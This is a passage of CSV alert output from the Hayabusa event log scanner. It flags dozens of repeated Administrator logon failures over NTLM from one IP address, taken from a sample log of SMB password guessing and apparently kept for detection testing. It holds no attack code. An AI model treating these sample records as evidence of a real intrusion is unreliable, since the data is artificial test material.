NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: 